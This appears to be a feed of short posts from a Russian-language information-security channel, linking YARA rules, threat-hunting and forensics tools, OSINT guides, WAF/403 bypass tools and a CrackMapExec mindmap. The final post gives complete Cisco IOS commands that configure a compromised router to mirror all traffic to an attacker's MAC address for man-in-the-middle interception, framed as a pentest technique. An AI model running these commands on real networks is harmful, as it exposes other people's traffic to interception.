🔥Yara rule set

https://github.com/pracsec/YaraTools

#Yara #rules #dfir

🔥Threat intelligence library

https://orkl.eu/

#ti #report

🔥Карта РФ рынка ИБ на 2023

Почитать можно тут - https://www.tadviser.ru/index.php/Статья:Карта_российского_рынка_информационной_безопасности_2023

#russia #market

🔥Evasion Techniques and
Breaching Defenses

#book #learn

🔥Tool for threat hunting in Azure

Умеет распознавать по MITRE

https://github.com/BlueTeamLabs/sentinel-attack

#azure #threathunting #dfir #sysmon #mitre

🕵️‍♂️Руководство по поиску в твиттере(расширенный вариант)

🕵️‍♂️Twitter Search Guide (extended version)

#osint #twitter‌‌

Translation: ru-en
🕵️‍♂️Twitter Search Guide (Advanced)

🕵️‍♂️Twitter Search Guide (extended version)

#osint #twitter‌‌

🔥Forensic toolkit

#forensic #tools

🔥ChatGPT bot

Для тех, кто хочет поднять своего бота

https://github.com/altryne/chatGPT-telegram-bot/

#chatgpt #ai #telegram #bot

🔥Visual yara


http://www.kitploit.com/2023/01/yaralyzer-visually-inspect-and-force.html

#Yara #forensic

🔥Windows logon events visualization

https://github.com/JPCERTCC/LogonTracer

#DFIR #Windows #Forensic #Events #Logon

🔥403 bypass

#waf #bypass #forbidden

🔥CME mindmap

https://raw.githubusercontent.com/Ignitetechnologies/Mindmap/main/Crackmapexec/Crackmapexec%20HD.png

#crackmapexec #cme #mindmap #tool #pentest

🔥403 Bypasser

Автоматика для пассивного тестирования в Burp

https://github.com/sting8k/BurpSuite_403Bypasser

#forbidden #bypass #waf

🔥Infosec направления

Также есть ссылки на курсы от SANS, которые связаны с направлением.

Ставь лайк, если ты тут есть😄

#infosec #sans #learn #courses

🔥Cool cheatsheet's

Сборник красивых шпаргалок и иллюстраций. Очень хорошо подойдет, чтобы дать мозгу отдохнуть и посмотреть прикольные схемки.

https://securityzines.com/

#learn #cheatsheet

🔥Neural networks list

Список нейронок, которые отсортированы по категориям

Думаю, что-нибудь для себя точно найдете

https://share-docs.clickup.com/25598832/d/h/rd6vg-14247/0b79ca1dc0f7429

#ai #neural

🔥Benchmark of subdomain enumeration tools

#subdomain #enumeration #recon #tool #benchmark

🔥Traffic mirroring

///Идея///

Если при пентесте сети есть скомпрометированный маршрутизатор Cisco, то можно попробовать сделать зеркалирование траффика

///Реализация///

Создаем профиль ToAttacker для экспорта трафика:

router(config)#ip traffic-export profile ToAttacker mode export

Указываем экспорт всего траффика:

router(conf-rite)#bidirectional

На какой интерфейс экспортируем:

router(conf-rite)#interface FastEthernet0/1

Какому mac адресу произвести передачу траффика, указываем наш MAC:

router(conf-rite)#mac-address 72db.9842.4f97
router(conf-rite)#exit

На каком интерфейсе будем слушать траффик:

router(config)#interface FastEthernet0/0
router(config-if)#ip traffic-export apply ToAttacker

///Заключение///

По итогу реализации, маршрутизатор будет слать весь траффик на подконтрольное устройство, что дает нам полноценный MITM.

Недостатком данного способа является то, что подконтрольное устройство должно находиться в одной сети с маршрутизатором.

#cisco #mitm